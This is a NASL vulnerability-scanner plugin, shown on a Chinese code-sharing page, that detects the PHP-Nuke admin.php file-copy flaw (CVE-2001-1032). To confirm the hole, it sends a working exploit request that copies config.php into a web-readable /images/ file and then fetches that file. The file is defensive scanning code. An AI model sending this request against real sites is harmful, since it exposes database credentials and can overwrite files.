php_nuke_admin_cp.nasl
来自「漏洞扫描源码,可以扫描linux,windows,交换机路由器」· NASL 代码 · 共 86 行
NASL
86 行
if (description){ script_id(10772); script_bugtraq_id(3361); script_cve_id("CVE-2001-1032"); script_version ("$Revision: 118 $"); script_name(english:"PHP-Nuke copying files security vulnerability (admin.php)"); desc["english"] = "The remote host seems to be vulnerable to a security problem in PHP-Nuke (admin.php). The vulnerability is caused by inadequate processing of queries by PHP-Nuke's admin.php which enables attackers to copy any file from the operating system to anywhere else on the operating system.Impact:Every file that the webserver has access to can be read by anyone. Furthermore, any file can be overwritten. Usernames (used for database access) can be compromised. Administrative privileges can be gained by copying sensitive files.Solution:Change the following lines in admin.php:if($upload) To:if (($upload) && ($admintest)) Or upgrade to the latest version (Version 5.3 and above).Risk factor : HighAdditional information:http://www.securiteam.com/unixfocus/TOBA"; script_description(english:desc["english"]); script_summary(english:"Determine if a remote host is vulnerable to the admin.php vulnerability"); script_category(ACT_GATHER_INFO); script_family(english:"CGI abuses", francais:"Abus de CGI"); script_copyright(english:"This script is Copyright (C) 2001 SecurITeam"); script_dependencie("php_nuke_installed.nasl"); script_require_ports("Services/www", 80); exit(0);}include("http_func.inc");include("http_keepalive.inc");port = get_http_port(default:80);if(!get_port_state(port))exit(0);installed = get_kb_item("www/" + port + "/php-nuke");if ( ! installed ) exit(0);array = eregmatch(pattern:"(.*) under (.*)", string:installed);if ( ! array ) exit(0);loc = array[2];data = string(loc, "admin.php?upload=1&file=config.php&file_name=openvas.txt&wdir=/images/&userfile=config.php&userfile_name=openvas.txt");req = http_get(item:data, port:port);buf = http_keepalive_send_recv(port:port, data:req);if(buf == NULL)exit(0); if ("SAFE MODE " >< buf) { security_note(port); exit(0); } if ("Unable to create " >< buf) { security_hole(port); exit(0); } req = http_get(item:"/images/openvas.txt", port:port);buf = http_keepalive_send_recv(port:port, data:req);if (("PHP-NUKE: Web Portal System" >< buf) && (("?php" >< buf) || ("?PHP" >< buf)) ) { security_hole(port); exit(0); }
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?